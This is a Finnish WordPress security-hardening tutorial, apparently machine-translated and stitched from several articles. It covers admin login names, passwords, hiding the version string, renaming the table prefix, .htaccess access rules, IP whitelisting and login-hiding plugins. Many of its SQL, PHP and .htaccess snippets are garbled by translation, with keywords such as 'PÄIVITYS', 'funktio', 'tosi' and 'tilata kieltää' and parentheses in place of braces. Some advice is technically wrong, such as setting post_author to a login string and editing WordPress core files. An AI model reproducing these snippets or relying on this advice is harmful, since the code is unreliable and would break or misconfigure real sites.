Artikkelista opit:

1. Käytä hyvää kirjautumistunnusta.

WordPress-sivuston suojaaminen alkaa jostain perustavasta – hyvän kirjautumisen luomisesta. Asentaessaan WordPressiä käyttäjät käyttävät usein sisäänkirjautumista, jonka asennusohjelma tarjoaa oletuksena, nimittäin - järjestelmänvalvoja. Tämän tarkistavat sivustosi tietoturva-aukkoja etsivät robotit ensin. Käyttämällä tätä kirjautumistunnusta annat jo puolet tarvittavista tiedoista hakkereille, ja heidän tarvitsee vain selvittää salasana.

Jos olet jo asentanut alustan ja työskentelet verkkosivustollasi, et todennäköisesti halua poistaa asennusta ja aloittaa alusta käyttääksesi turvallisempaa kirjautumista. Siellä on uloskäynti:

Vaihe 1 – Luo uusi käyttäjä

Kirjaudu sisään WordPressin hallintapaneeliin ja luo uusi tili monimutkaisemmalla kirjautumistunnuksella, jolla on täysi pääsy kaikkiin sivuston toimintoihin, eli järjestelmänvalvojan oikeuksiin.

Valitse vasemmalla olevasta päävalikosta Käyttäjät >> Lisää uusi.

Syötä kaikki tarvittavat tiedot uudelle käyttäjälle ja määritä hänen roolinsa "Järjestelmänvalvoja" ja paina "Lisää uusi käyttäjä".

Vaihe 2 – Järjestelmänvalvojan käyttäjän poistaminen

Tämän jälkeen kirjaudu ulos hallintajärjestelmästä, kirjaudu sisään uudella tili ja poista käyttäjä järjestelmänvalvoja järjestelmästä jollakin seuraavista tavoista:

Tapa 1 – Valitse vasemmalla olevasta päävalikosta Käyttäjät >> Kaikki käyttäjät. Vie hiiri käyttäjänimen päälle järjestelmänvalvoja ja näet toiminnon "Poistaa".

Tapa 2 - Valitse vasemmalla olevasta päävalikosta Käyttäjät >> Kaikki käyttäjät. Etsi käyttäjä järjestelmänvalvoja, valitse se ja avattavasta valikosta "Toiminnot" valitse "Poistaa". Napsauta sen jälkeen vaihtoehtoa "Käytä" käyttäjäluettelon alla. Tämä vaihtoehto on kätevä, jos haluat poistaa useita käyttäjiä kerralla.

Voit myös vaihtaa järjestelmänvalvojan käyttäjänimen tietokantakyselyn kautta:
UPDATE wp_users SET user_login = 'uusi_kirjautuminen' WHERE user_login = 'admin';

Tällä menetelmällä on haittapuoli: kirjoittaja on käyttäjän kirjoittamia viestejä varten järjestelmänvalvoja, ei muutu. Korjataksesi tämän sinun on tehtävä uusi kysely tietokantaan:
PÄIVITYS wp_posts SET post_author = 'uusi_kirjautuminen' WHERE post_author = 'admin';

2. Käytä monimutkaista ja ainutlaatuista salasanaa.

WordPress-järjestelmänvalvojasi suojaaminen on tietysti mahdotonta ilman vahvaa ja hyvää salasanaa. On tärkeää, että se on ainutlaatuinen ja sisältää numeroita, eri kirjaimia, välimerkkejä, symboleja jne. Salasanat, kuten: pass, 1q2w3e4r5t6y, 87654321, qwerty, abc123, 111111, 1234, syntymäaikasi jne. – eivät ole luotettavia, mutta monet käyttäjät käyttävät niitä edelleen. Esimerkki hyvästä salasanasta: pcVaOF8r39. Tietenkin sinun on vaikea muistaa tällaista salasanaa, mutta tätä varten on useita ohjelmia, jotka tallentavat ja luovat salasanoja, ja ne voidaan myös integroida selaimesi käyttöliittymään (esimerkiksi Password Agent, KeyPass, Roboform jne.)

Jos haluat silti muistaa salasanasi ulkoa, suosittelemme luomaan yhdistelmäsalasanan tutusta nimestä/sanasta, jossa on muutama iso kirjain/numero satunnaisissa paikoissa ja muutama erikoismerkki alussa tai lopussa. Tällaista salasanaa on myös vaikea arvata, mutta se on melko helppo muistaa.

Muista päivittää salasanasi säännöllisesti.

3. Päivitä WordPress-versiosi.

WordPress välittää käyttäjistään, ja siksi voit löytää uloskirjautumisilmoitukset hallintapaneelistasi uusi versio. Suosittelemme päivittämään sen heti, kun näet sen, koska yksi sivustosi yleisimmistä tietoturva-aukoista käyttää vanhentunut versio alustat.

4. Piilota WordPress-versio.

WordPress lisää oletuksena nykyisen versionumeron lähde tiedostosi ja sivusi. Ja koska melko usein ei ole aina mahdollista päivittää WordPressin versiota ajoissa, tästä voi tulla heikko kohta kotisivusi. Tietäen, mikä WordPress-versio sinulla on, hakkeri voi tehdä paljon vahinkoa.

Tiedoston käyttäminen Functions.php Voit estää alustaversiosi tietojen näyttämisen. Tätä varten sinun on avattava tiedosto Functions.php, joka sijaitsee verkkosivustosi nykyisen teeman juurikansiossa (wp-content/themes/current_theme_wordpress) ja lisää seuraava koodi:
remove_action('wp_head', 'wp_generator');

Tai voit lisätä tiedostoon seuraavan koodin Functions.php:

/* Piilota WP-version merkkijonot skripteistä ja tyyleistä
* @return (merkkijono) $src
* @filter script_loader_src
* @filter style_loader_src
*/
funktio fjarrett_remove_wp_version_strings($src) (
globaali $wp_version;
parse_str(parse_url($src, PHP_URL_QUERY), $kysely);
if (!empty($query['ver']) && $query['ver'] === $wp_version) (
$src = remove_query_arg('ver', $src);
}
palauttaa $src;
}
add_filter('script_loader_src', 'fjarrett_remove_wp_version_strings');
add_filter('style_loader_src', 'fjarrett_remove_wp_version_strings');

/* Piilota WP-version merkkijonot generaattorin sisällönkuvauskentistä */
funktio wpmudev_remove_version() (
paluu ";
}
add_filter('the_generator', 'wpmudev_remove_version');

Yllä olevien lisäksi löydät mistä tahansa WordPress-teemakansiosta header.php tiedosto. Se ilmaisee myös asennuksesi version, joka on erittäin mielenkiintoinen hakkereille, kuten aiemmin mainittiin. Poistamalla seuraavan rivin tiedostosta pääset eroon tästä tarpeettomasta tiedosta:

” />

5. Lataa teemoja ja laajennuksia luotettavista lähteistä.

WordPress on niin laajalle levinnyt, että yhä useammat kehittäjät luovat siihen valmiita teemoja ja laajennuksia. Suurin osa niistä helpottaa sivustosi käyttöä ja laajentaa sen toimintoja, mutta jotkut voivat piilottaa erittäin epämiellyttäviä seurauksia virusten muodossa ja avata oven hakkereille. Käytä vain luotettuja resursseja teemojen ja lisäosien lataamiseen, esimerkiksi wordpress.org, ja kiinnitä myös huomiota haitallisista tiedostoista tuleviin varoituksiin. Aivan kuten itse WordPressissä, on tärkeää pitää laajennukset ajan tasalla uusimpien versioiden kanssa.

6. Älä säilytä tarpeettomia tiedostoja.

Ei-aktiiviset laajennukset voivat muodostaa vakavan uhan verkkosivustosi turvallisuudelle. Siksi voit vapaasti poistaa kaikki käyttämättömät laajennukset ja teemat. Asensit sen esimerkiksi testataksesi ja valitaksesi käytettävän. Kun olet valinnut, älä unohda poistaa kaikkia tarpeettomia.

7. Tarkista paikallinen tietokoneesi säännöllisesti virusten varalta.

Eri vaiheet WordPress-sivustosi suojaamiseksi on hyvä asia, mutta sinun on myös pidettävä silmällä tietokonettasi. Sinulla on oltava jatkuvasti päivitettävä virustorjunta asennettuna. Muussa tapauksessa saatat saastuttaa verkkosivustosi lataamalla siihen virustiedostoja.

8. Tee varmuuskopiot sivustosta.

Kaikkia haitallisia hyökkäyksiä ei voida estää, mutta vain yksi onnistunut hyökkäys voi tuhota kaikki pyrkimykset työskennellä sivustollasi. Suosittelemme, että teet säännöllisesti varmuuskopiot verkkosivustostasi. Monet hosting-yritykset tarjoavat mahdollisuuden palvelimen varmuuskopiointiin, ja jos jotain tapahtuu, voit palauttaa sivuston palvelimella olevasta kopiosta.

Asentamalla WordPress Database Backup -laajennuksen voit suojata sivustosi tietokantaa entisestään. Plugin-asetuksissa voit määrittää päivittäisen tietokannan varmuuskopion lähettämisen yhteystietopostilaatikkoosi.

9. Käytä suojattua yhteyttä.

Jos haluat ladata tiedostosi mieluummin FTP-asiakasohjelman avulla, käytä suojattua yhteysprotokollaa SFTP-palvelimeen.

10. Luo .htaccess-tiedosto.

Pikalinkittämistä vastaan ​​suojaava koodi:

RewriteEngine päällä
RewriteCond %(HTTP_REFERER) !^http://(.+\.)?omaverkkotunnus\.com/
RewriteCond %(HTTP_REFERER) !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /images/nohotlink.jpg [L]

Hotlinking on kuvan lisääminen palvelimeltasi jonkun toisen verkkosivustolle/blogiin. Liikenne menee suoraan palvelimellesi.

Yllä olevan koodin avulla voit pakottaa palvelimen tarkistamaan, mistä pyyntö tarkalleen tuli: jos verkkosivustosi sivuilta, palvelin palauttaa kuvan käyttäjälle ilman ongelmia; jos se on jonkun muun verkkosivustolta, se näyttää kuvan, jossa on virhe.

11. Muuta tietokantataulukoiden etuliite.

WordPressin suojaus hakkereilta paranee myös, jos alkuperäinen etuliite poistetaan. wp_ — Tämä vaikeuttaa hyökkääjien löytämistä. Harkitse useita tapoja:

Tapa 1 – Soveltuu uusiin asennuksiin Softaculousin kautta
Jos isännöintipalveluntarjoajasi sallii sinun käyttää Softaculous-skriptiä WordPressin asentamiseen, voit vaihtaa etuliitettä alkuperäisen asennuksen aikana: Advanced Options -osiossa sinun on tehtävä tarvittavat muutokset.

Tapa 2 – Jo käynnissä oleville sivustoille ja tuoreille WordPress-asennuksille
Jos WordPress on ollut asennettuna pitkään ja sivusto on käynnissä, voit vaihtaa etuliitettä phpMyAdmin-ohjelmalla.

Valitse luettelosta haluamasi tietokanta ja tee seuraava tietokantakysely:

NIMEÄ UUDELLEEN taulukko `wp_commentmeta` `newprefix_commentmeta`;
NIMEÄ UUDELLEEN taulukko `wp_comments`: `newprefix_comments`;
NIMEÄ UUDELLEEN taulukko `wp_links` `newprefix_links`;
NIMEÄ UUDELLEEN taulukko `wp_options`: `newprefix_options`;
NIMEÄ UUDELLEEN taulukko `wp_postmeta` `newprefix_postmeta`;
NIMEÄ UUDELLEEN taulukko `wp_posts` `newprefix_posts`;
NIMEÄ UUDELLEEN taulukko `wp_terms` `newprefix_terms`;
NIMI taulukko `wp_term_relationships` TO `newprefix_term_relationships`;
NIMI taulukko `wp_term_taxonomy` `newprefix_term_taxonomy`;
NIMEÄ UUDELLEEN taulukko `wp_usermeta` `newprefix_usermeta`;
NIMEÄ UUDELLEEN taulukko `wp_users` `newprefix_users`;

Missä "newprefix_" on korvattava uudella etuliitteellä, jota haluat käyttää etuliitteen sijaan "wp_".

Tämän jälkeen näet uuden etuliitteen tietokantataulukoissa:

Varmistaaksemme, että kaikki muutokset onnistuivat ja wp_-etuliitettä ei enää käytetä taulukossa _optiot Ja _usermeta, sinun on tehtävä toinen kysely tietokantaan:

SELECT * FROM `newprefix_options` WHERE `option_name` LIKE '%wp_%'

SELECT * FROM `newprefix_usermeta` WHERE `meta_key` LIKE '%wp_%'

Tämän seurauksena saatat löytää useita etuliitteitä, jotka sinun on nimettävä uudelleen manuaalisesti painikkeella Muuttaa:

Tehtävien muutosten määrä voi vaihdella. Mutta kaikki etuliitteet wp_ sinun on vaihdettava uuteen etuliitteeseesi, jotta verkkosivusto toimisi oikein.

Älä unohda sen jälkeen tehdä myös etuliitteen muutoksia wp-config.php tiedosto:

Voit myös käyttää erityisiä laajennuksia muuttaaksesi tietokannan etuliitettä: Muuta DB-etuliite tai Vaihda taulukon etuliite.

12. Rajoita pääsyyritysten määrää.

Useimmiten hyökkääjät tekevät valtavan määrän yrityksiä päästä sivustollesi arvaamalla salasanasi. Voit määrittää järjestelmän estämään IP-osoitteen useiksi tunteiksi tietyn määrän epäonnistuneiden kirjautumisyritysten jälkeen.

Voit tehdä tämän käyttämällä lisälaajennuksia, kuten Login LockDown tai Limit Login Attempts. Näiden laajennusten asetuksissa voit asettaa itsenäisesti sisäänkirjautumisyritysten määrän ja estoajan.

Lisäksi on mahdollista piilottaa viesti, joka ilmoittaa, että syötetty käyttäjätunnus ja salasana ovat virheellisiä. Loppujen lopuksi tämä on myös tietoa, joka voi auttaa hyökkääjää.

Jos haluat estää tämän viestin, sinun on avattava tiedosto Functions.php, joka sijaitsee verkkosivustosi nykyisessä teemakansiossa (wp-content/themes/current_theme_WordPress) ja lisää tämä koodi:
add_filter('login_errors',create_function('$a', "return null;"));

13. Poista readme.html ja licence.txt.

Readme.html- ja licence.txt-tiedostot ovat jokaisen WordPress-asennuksen juurikansiossa. Näistä tiedostoista ei ole sinulle hyötyä, mutta ne voivat tarjota hakkereille todisteita rikoksistaan. Esimerkiksi saadaksesi selville WordPressin nykyisen version ja monia muita hyödyllisiä asioita verkkosivuston hakkerointiin. Suosittelemme poistamaan ne välittömästi WordPressin asennuksen jälkeen.

14. Käytä SSL-varmennetta.

Suojatun tiedon ja tiedonvaihdon luottamuksellisuuden siirtämiseksi suosittelemme SSL-protokollan käyttöä. Tämä koskee erityisesti verkkokauppoja, jos et halua, että asiakkaidesi henkilötietoja välitetään suojaamattomalla tavalla.

Ensinnäkin sinun on asennettava se verkkotunnuksellesi.

Tämän jälkeen voit asettaa SSL-protokollan pakollisen käytön kirjautuessasi sivustosi ohjauspaneeliin. Voit tehdä tämän avaamalla wp-config.php tiedosto, joka sijaitsee sivustosi juurikansiossa ja lisää seuraava rivi:
define('FORCE_SSL_ADMIN', tosi);

15. Muokkaa wp-config.php-tiedostoa.

Lisäämällä tämän koodin wp-config.php tiedostoa, voit myös vahvistaa verkkosivustosi suojausta:

Rajoitukset teeman ja lisäosien muutoksille:
define('DISALLOW_FILE_EDIT', tosi);

Lisäosien asentamisen ja poistamisen estäminen:
define('DISALLOW_FILE_MODS', true);

Suola-avainten tai ns. turva-avainten lisääminen: ensin sinun on löydettävä tällaiset rivit wp-config.php tiedosto:

Näet, että avaimet on jo asennettu ja ne voidaan vaihtaa. Tai näet tällaiset rivit: 'laita ainutlaatuinen lauseesi tähän', mikä osoittaa, että avaimia ei ole vielä asennettu:
/**#@+
* Todennus ainutlaatuiset avaimet ja suolat.
*
* Muuta nämä erilaisiksi ainutlaatuisiksi lauseiksi!
* Voit luoda nämä käyttämällä (@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org salainen avain -palvelu)
* Voit muuttaa näitä milloin tahansa mitätöidäksesi kaikki olemassa olevat evästeet. Tämä pakottaa kaikki käyttäjät kirjautumaan uudelleen sisään.
*
* @alkaen 2.6.0
*/
define('AUTH_KEY', 'laita ainutlaatuinen lauseesi tähän');
define('SECURE_AUTH_KEY', 'laita ainutlaatuinen lauseesi tähän');
define('LOGGED_IN_KEY', 'laita ainutlaatuinen lauseesi tähän');
define('NONCE_KEY', 'laita ainutlaatuinen lauseesi tähän');
define('AUTH_SALT', 'laita ainutlaatuinen lauseesi tähän');
define('SECURE_AUTH_SALT', 'laita ainutlaatuinen lauseesi tähän');
define('LOGGED_IN_SALT', 'laita ainutlaatuinen lauseesi tähän');
define('NONCE_SALT', 'laita ainutlaatuinen lauseesi tähän');

Haluaisin mainita muutamat lisäosat erikseen:

Tämä on WordPress-suojauslaajennus, jonka avulla voit tarkistaa verkkosivustosi haitallisen koodin, hakkereiden jättämien aukkojen ja porsaanreikkien varalta ja näyttää reaaliaikaiset sivusto- ja liikenneanalyysit. On myös mahdollista määrittää automaattinen skannaus ja paljon muuta.

Tämä laajennus tarkistaa verkkosivustosi erilaisten tietoturva-aukkojen varalta ja tarjoaa useita tapoja korjata ne. Esimerkiksi salasanat, erilaiset tiedostojen käyttöoikeudet, tietokannan suojaus, WordPress-version tietojen suojaus, järjestelmänvalvojan suojaus jne.

Tämän laajennuksen avulla voit suojata käyttäjätilit ja kirjautumiset, tietokannat ja tiedostojärjestelmät, estää brute force -hyökkäykset (salasanan arvaushyökkäykset), tarkistaa sivuston jne.

Niin surulliselta kuin se kuulostaakin, WordPressin suojaaminen on monimutkainen asia, eivätkä tässä artikkelissa kuvatut menetelmät takaa 100 %, että sivustosi on täysin suojattu kaikilta huijareilta. Älä kuitenkaan laiminlyödä niitä, koska ne vähentävät merkittävästi hakkerien mahdollisuutta hakkeroida sivustoa.

WordPress on erittäin suosittu sisällönhallintajärjestelmä, tämä on epäilemättä sen etu, kaikkiin tehtäviin on monia laajennuksia, mutta tämä on myös sen heikkous, koska mitä suositumpi CMS sivustolla on, sitä enemmän hyökkäyksiä siihen kohdistuu, tai pikemminkin se on mielenkiintoisempaa hyökkääjälle, koska WordPressissä haavoittuvuuden löytämisen jälkeen hyökkääjien saataville tulee satoja tuhansia sivustoja, joten WordPress-sivustosi suojaaminen vaatii erityistä huomiota.

Miksi WordPress-sivustoja hakkeroidaan?

Kaikki suositut sisällönhallintajärjestelmät (verkkosivustomoottorit) hakkeroidaan, eikä WordPress ole poikkeus, hakkeroin pääasiassa niin sanotuilla ohjelmilla (skripteillä) - hyväksikäyttö, sivuston hallitsemiseksi, tämä tehdään pääasiassa linkkien luomiseksi sivustostasi muihin resursseihin , ja luoda BotNet, joka suorittaa DDoS-hyökkäyksiä muihin palvelimiin sivuston pysyessä toimintakunnossa, etkä koskaan näe paljaalla silmällä, että se on saastunut. Joka tapauksessa hakkerointi vaikuttaa huonosti sivustoosi, ja saatat jopa kadota hakutuloksista.

Kuten jo sanoin, hakkerointi tapahtuu automaattisesti, sivuston CMS:n tunnistaminen ei ole vaikeaa, tähän on monia online-palveluita, usein hyökkäävä ohjelma yrittää arvata salasanan sivuston hallinnollisesta osasta, ts. menee osoitteeseen your-site.ru/wp-admin ja yrittää arvata käyttäjäsi salasanan, käyttäjänimen selvittäminen ei ole vaikeaa, kirjoitat sen alle artikkeleita, joten kirjautuminen näkyy boteille, he tietävät minne Etsi sitä. ellet tietysti sulkenut sitä liitännällä, josta yhdestä puhumme alla. Sivuston ylläpitäjän salasanan tulisi olla hyvin monimutkainen, mutta vaikka tämä ehto täyttyisi, et voi antaa botien yrittää (raaka voima) "hallintapaneelin" salasanaa, koska tämä ei ole välttämätön kuormitus palvelimelle. useita kymmeniä robotteja eri puolilta maailmaa tekevät tätä.

Plugin suojaa WordPressiä hyökkäyksiltä

Siirrytään suoraan laajennukseen, harkitsemisen arvoisia on useita, puhutaanpa yksinkertaisemmasta ja ymmärrettävämmästä, käytän sitä monissa projekteissani, asiakkaille, se selviää erittäin hyvin osoitetuista sivuston suojaustehtävistä -

Tämä laajennus on melko helppo oppia, ja se on 90% venäläistetty, se asennetaan kuten mikä tahansa laajennus WordPress-arkistosta, asennuksen jälkeen sinun on aktivoitava se ja tehtävä perusasetukset. Se näkyy WordPressin hallinta-alueen päävalikossa

WP Security Plugin -ohjauspaneeli

Kun olet siirtynyt laajennuksen asetuksiin, pääsemme ohjauspaneeliin. Täällä voit tehdä tärkeitä perusasetuksia.

1. Näyttää viimeiset 5 valtuutusta hallintapaneelissasi, käyttäjä ja IP-osoite on määritetty, esimerkiksi näen heti IP-osoitteeni, niitä on vain kaksi, joten minulla ei ole epäilystäkään siitä, että joku muu tietää salasanani hallintaosasta.
2. Tärkeimpien toimintojen osio, johon sinun on sisällytettävä kaikki ja hyväksyttävä kaikki.
3. Laajennus pystyy seuraamaan tiedostojen muutoksia isännöinnissä ja se voi lähettää sinulle raportin sähköpostitse, ja olet aina tietoinen mitkä tiedostot ovat muuttuneet, tämä on erittäin hyödyllistä, jos sinulle ladataan jonkinlainen komentosarja tai mikä tahansa tiedosto haitallisella koodilla, näet sen heti raportissa, ainoa negatiivinen on se, että kun olet päivittänyt kaikki muut asentamasi lisäosat tai itse WordPress-moottori, WP Security näkee kaikki nämä muutokset ja lähettää sinulle valtavan luettelon, mutta voit saada tottunut näihin raportteihin, koska tiedät, milloin päivitit tiedostot itse.
4. Tämä kohde muuttaa sivuston hallintapaneelin yoursite.ru/wp-admin vakioosoitteeksi yoursite.ru/luboe-slovo. Tämä säästää hallintapaneelisi joiltakin mahdollisilta hakkereilta ja boteilta, mutta valitettavasti ei kaikilta. , varsinkin edistyneet löytävät sen edelleen, voin arvioida tämän katsomalla "Valtuutukset" -osiota, mutta siitä lisää myöhemmin.
5. Tämä kohde tulisi kytkeä pois päältä, kuten kuvakaappauksessa, sitä tarvitaan vain kun haluat laittaa sivuston ylläpitoon, vierailijoille annetaan kyltti, jossa on viesti, että sivustolla tehdään teknisiä töitä, joskus tästä on hyötyä, esim. , kun muutat sivuston ulkoasua tai jos jokin globaali muutos, älä unohda, että tässä tilassa hakurobotit eivät myöskään voi tarkastella sivustoasi, älä sulje sitä pitkäksi aikaa.

WordPressin järjestelmänvalvojan alueen suojaaminen salasanan arvailulta

Siirrytään nyt valikkokohtaan - Valtuutus, mielestäni erittäin hyödyllinen kohde, ja se kannattaa määrittää, kuten se on yhdellä sivustollani. noin 1000 ihmisen läsnäollessa plugin nappaa päivittäin kymmeniä yrityksiä arvata salasana hallintapaneeliin ja lisää hakkereiden IP-osoitteet mustalle listalle, ts. estää sen kokonaan, sivusto lakkaa vastaamasta tähän IP-osoitteeseen, mikä kumoaa yritykset löytää salasana, asetukset, jotka teen näytöllä.

1. Jätän "erehdys" -yritysten lukumääräksi -3, älä tee vähemmän, saatat kirjoittaa itse salasanan väärin ja päätyä mustalle listalle IP-osoitteesi kanssa, sinun on
2. Tämä on aika, jonka jälkeen virheellisten kirjautumisyritysten laskuri nollataan.
3. Asetin estojakson IP-osoitteille, joista tehtiin virheellisiä valtuutusyrityksiä, pidemmäksi minuuteissa, ts. kylvyssä pitkään, kuvakaappaus näyttää 6 000 000 minuuttia, se on noin 11 vuotta, mielestäni se riittää

Kaikilta estetyiltä IP-osoitteilta estetään pääsy paitsi hallintapaneeliin, myös koko sivustoon, muista tämä

Luettelo estetyistä IP-osoitteista

1. hyökkääjän IP-osoite
2. kirjautumistunnus, jolle salasana valittiin, on muuten oikea
3. päivämäärä, jolloin automaattinen esto tehtiin

Valkoinen luettelo hallintapaneelin osoitteista

Jos haluat sallia pääsyn WordPress-sivuston hallintaosaan vain tietyistä IP-osoitteista, voit aktivoida osoitteiden valkoisen listan laajennuksen asetuksista.

1. aktivoimalla tämän vaihtoehdon
2. tässä on nykyinen IP-osoitteesi
3. Kirjoita tähän kenttään kaikki IP-osoitteet, joista pääsy hallintapaneeliin on sallittu

Jos sinun on määritettävä IP-osoitteiden alue, käytä numeron sijasta tähteä, esimerkiksi 192.168.5.* - tämä malli antaa pääsyn WordPressin hallintapaneeliin kaikista näillä numeroilla alkavista IP-osoitteista. olla hyödyllinen niille, joilla ei ole omaa IP-osoitetta , ja se muuttuu jatkuvasti, esimerkiksi työskennellessäsi langattoman Internetin kanssa, alue pysyy yleensä kahden ensimmäisen numeron sisällä, kuten tämä, esimerkiksi 192.168.* .*

Lukuaika: 4 min

Vielä vuosi sitten palvelimeni kuormitus ylitti usein tariffin salliman rajan. Lisäksi ongelma ei ollut itse sivustoissa, vaan hyökkääjien banaalissa hyökkäyksessä hallintapaneeliin saadakseen pääsyn joihinkin omiin tarkoituksiinsa.

Tänään kerron sinulle, kuinka käsitin ongelman, minkä neuvon tekemään kotona varmuuden vuoksi.

Tämän seurauksena päätettiin muuttaa hallintapaneelin kirjautumislomakkeen osoite sekä sulkea hallintapaneeli kaikilta tuntemattomilta, joilla ei ole IP-osoitettani.

On syytä huomata, että jotkut isännöintiyritykset loivat automaattisesti uuden järjestelmänvalvojan osoitteen kaikille käyttäjille. Jos käytät tällaisten hosting-palvelujen palveluita, älä lue lisää artikkeleita äläkä tuhlaa aikaa.

Kuinka muuttaa WordPress-järjestelmänvalvojan osoite

Olen aiemmin julkaissut tällaisen artikkelin. Tässä näyttää olevan samanlainen tulos, mutta vaikutus ja tarkoitus ovat erilaiset.

Älä unohda tehdä varmuuskopioita käsittelemistäsi tiedostoista.

• Kopioi ensin wp-login.php-tiedosto sivuston juuresta (jossa wp-config.php sijaitsee) ftp:n kautta tietokoneellesi.
• Nimeä se uudelleen haluamallasi tavalla. Esimerkiksi vhod.php
• Avaa tämä tiedosto ilmaisella Notepad++ -ohjelmalla (tai millä tahansa sinulle sopivammalla muokkausohjelmalla) ja korvaa kaikki ilmaisun wp-login.php esiintymät sanalla vhod.php .

Voit tehdä tämän nopeasti painamalla CTRL+F Muistiossa++. No, kirjoita näkyviin tulevaan ikkunaan:

Joten hetkessä korvasin koko tiedostossa tarvittavan lauseen. Se tuli vastaan ​​12 kertaa.

Lataamme uuden tiedoston ftp:hen.

Samanlainen asia on tehtävä general-template.php-tiedostossa, joka löytyy wp-includes-kansiosta ftp:ssä. Nuo. muuta lauseen wp-login.php esiintyminen muotoon vhod.php , mutta älä muuta itse tiedoston nimeä!

Nyt sinulla on .htaccess-tiedosto siellä sivuston juuressa. Kopioimme sen myös tietokoneellemme ja avaamme sen muokkausta varten (voit käyttää tavallista Windows-muistikirjaa). Lisäämme koodinpätkän, joka estää kaikkien pääsyn wp-login.php-tiedostoon

Tilaa Estä, Salli Estä kaikilta

< Files wp - login . php > Tilaa Estä, Salli Kiellä kaikilta < / Files >

Juuri tämä askel kevensi taakkaa ja piilotti myös valtuutuslomakkeen. Kuormitusta kevennettiin lisäämällä esitetty koodi .htaccess-tiedostoon: jos osoitteeseen http://site.ru/wp-login.php soitetaan, se antaisi 403-virheen, ei 404:ää.

Toistakaamme lyhyesti toiminta-algoritmi:

• Nimeä wp-login.php-tiedosto uudelleen mielivaltaiseksi nimeksi ja korvaa nimen esiintymät uudella.
• Vastaavasti general-template.php-tiedostossa korvaamme vanhan nimen wp-login.php uudella nimellä.
• Rekisteröimme .htaccess-tiedostoon wp-login.php:n pääsykiellon kaikille

WordPressin päivityksen jälkeen korjaamatta jää vain general-template.php-tiedosto. Mutta koska Moottoria ei päivitetä kovin usein - tämä on pieni asia vaikutukseen verrattuna.

Asetamme rajoituksen sisäänkirjautumiselle IP:n kautta .htaccess-protokollan kautta

Lisätoimena sivuston suojaamiseksi otin käyttöön rajoituksen, joka koskee kirjautumista hallintapaneeliin IP:n kautta. Ongelma ratkesi hyvin yksinkertaisesti: luo tyhjä .htaccess-tiedosto ja lisää siihen seuraava koodi

tilata kieltää, sallia sallia alkaen 192.168.0.1 kieltää kaikilta

tilaus kieltää, sallia sallia alkaen 192.168.0.1 kieltää kaikilta

Tallennamme tiedoston ja pudotamme sen wp-admin-kansioon samassa paikassa sivuston juuressa.

Esimerkin IP-osoitteeni sijasta laita oikea. Lisäksi voit lisätä useita IP-osoitteita uudella rivillä:

tilata kieltää, sallia sallia alkaen 126.142.40.16 sallia alkaen 195.234.69.6 kieltää kaikista

tilaus kieltää, sallia sallia 126.142.40.16 alkaen sallia alkaen 195.234.69.6 kieltää kaikilta

Jos IP on dynaaminen, voit laittaa numeroita vain ensimmäiseen, toiseen tai kolmanteen pisteeseen asti:

Tiedät todennäköisesti jo, kuinka pääset WordPressin hallinta-alueelle?

Voit tehdä tämän vähintään neljällä tavalla lisäämällä sivustosi osoitteeseen:

1. /admin, ts. näin: http://sivustosi/admin
2. /wp-admin
3. /Kirjaudu sisään
4. /wp-login.php

Yleensä kaikki kolme ensimmäistä uudelleenohjausvaihtoehtoa johtavat silti sivulle: http://sivustosi/wp-login.php

Osoittautuu, että kuka tahansa voi lisätä minkä tahansa edellä kuvatuista neljästä etuliitteestä sivustosi osoitteeseen ja näkee järjestelmänvalvojan kirjautumistunnuksen:

Tämä ei tietenkään tarkoita ollenkaan, että kuka tahansa pääsisi helposti hallintapaneeliin, koska hänen on tiedettävä myös käyttäjätunnus tai sähköpostiosoitteesi ja salasanasi.

Jos järjestelmänvalvojallasi on kirjautumistunnus: – tämä ei ole sinulta ollenkaan järkevää ja hyökkääjän on vain arvattava tai arvattava salasanasi.

Lisäksi näit merkinnän: Käyttäjätunnus vai sähköpostiosoite? Kyllä, kyllä, WordPress voi käyttää sähköpostia käyttäjätunnuksena. Voit kuitenkin ilmoittaa jossain sivustossa sähköpostiosoitteen, joka vastaa järjestelmänvalvojan sähköpostiosoitetta. Osoittautuu, että hyökkääjä voi ensin yrittää syöttää sähköpostiosoitteesi ja sitten WordPress auttaa häntä uudelleen, koska jos sähköposti ei sovi, hän näkee tämän viestin:

ja jos sähköposti on oikea, WordPress kirjoittaa, että sen salasana on väärä:

Tämän seurauksena meillä on tilanne, jossa mahdollisen hyökkääjän tarvitsee vain arvata tai arvata salasanasi voidakseen hakkeroida sivustosi (pääsy hallintapaneeliin).

Kuinka suojata järjestelmänvalvojan kirjautuminen mahdolliselta uhalta? Vastaus on yksinkertainen – yritä lisätä syöttämiseen vaadittavien tuntemattomien määrää.

Katsotaanpa nyt tarkemmin:

1. Jos mahdollista, varmista, että ylläpitäjän sähköpostiosoitetta ei mainita missään sivustolla - julkisen sähköpostin tulee olla jotain muuta.
2. Salasanasi ei saa olla yksinkertainen, kun asennat WordPressin itse, se luo sinulle monimutkaisen salasanan, jos et halua käyttää sitä, keksi jokin enemmän tai vähemmän monimutkainen salasana, joka sisältää pieniä ja suuria merkkejä, numeroita ja joitain symboleja, kuten -, ?, _ jne.
3. Käyttäjätunnuksesi ei myöskään saa olla yksinkertainen: admin, manager, root, administrator, user ja muita yksinkertaisia ​​sanoja!
4. Ja lopuksi sinun on syötettävä kolmanneksi tärkein tuntematon - vaihda järjestelmänvalvojan kirjautumis-URL-osoite, asenna tämä varten yksinkertainen laajennus: WPS Piilota kirjautuminen

WPS Piilota kirjautuminen

Yksinkertainen, ilmainen ja melko suosittu laajennus, jonka avulla voit muuttaa järjestelmänvalvojan kirjautumis-URL-osoitetta.

Kun olet asentanut ja aktivoinut laajennuksen, sinun on siirryttävä järjestelmänvalvojan osioon: Asetukset / Yleiset, vieritä sitten sivun alaosaan ja näet vain yhden tämän laajennuksen lisäämän parametrin:

Oletusarvoisesti laajennus ehdottaa kirjautumistunnuksen http://sivustosi/login käyttöä - mutta tämä ei suinkaan ole paras vaihtoehto! Keksi jotain omaa, esim. yyy12_go)))

Kun olet muuttanut tämän parametrin, älä unohda napsauttaa painiketta Tallenna muutokset– muuten, kun laajennus on aktiivinen, kirjaudut sisään http://sivustosi/login kautta

Muista kirjautua ulos ja kirjautua takaisin järjestelmänvalvoja-alueelle, mutta käytä uutta kirjautumisosoitetta, jonka olet keksinyt itse, ja mikä tärkeintä, älä unohda sitä!

Kun olet vaihtanut järjestelmänvalvojan aloituspisteen, käyttäjä saa 404-virhesivun yrittäessään käyttää tavallisia URL-osoitteita.

